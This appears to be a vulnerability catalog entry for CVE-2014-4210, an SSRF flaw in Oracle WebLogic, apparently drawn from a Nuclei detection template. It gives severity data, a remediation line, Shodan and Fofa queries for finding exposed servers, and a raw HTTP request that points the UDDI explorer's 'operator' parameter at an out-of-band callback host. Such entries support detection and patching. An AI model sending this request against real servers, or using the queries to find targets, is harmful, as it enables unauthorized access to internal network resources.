| Title | Oracle Weblogic - Server-Side Request Forgery |
|---|---|
| Author | princechaddha |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources. |
| Remediation | Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability |
| CVSS Score | 5 |
| EPSS Score | 0.94152 |
| CVE ID | CVE-2014-4210 |
| CWE ID | NVD-CWE-noinfo |
| Shodan Query | title:"Weblogic"http.title:"weblogic"http.html:"weblogic application server" |
| Fofa Query | title="weblogic"body="weblogic application server" |
| Tags | cve2014 cve seclists weblogic oracle ssrf oast xss vuln |
An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey&txtSearchfor&selfor=Business+location&btnSubmit=Search&operator=http://d5jqqv1le0o2oc29b4l0exfw63byidtrk.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-4210.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-4210.pcap
N/AN/A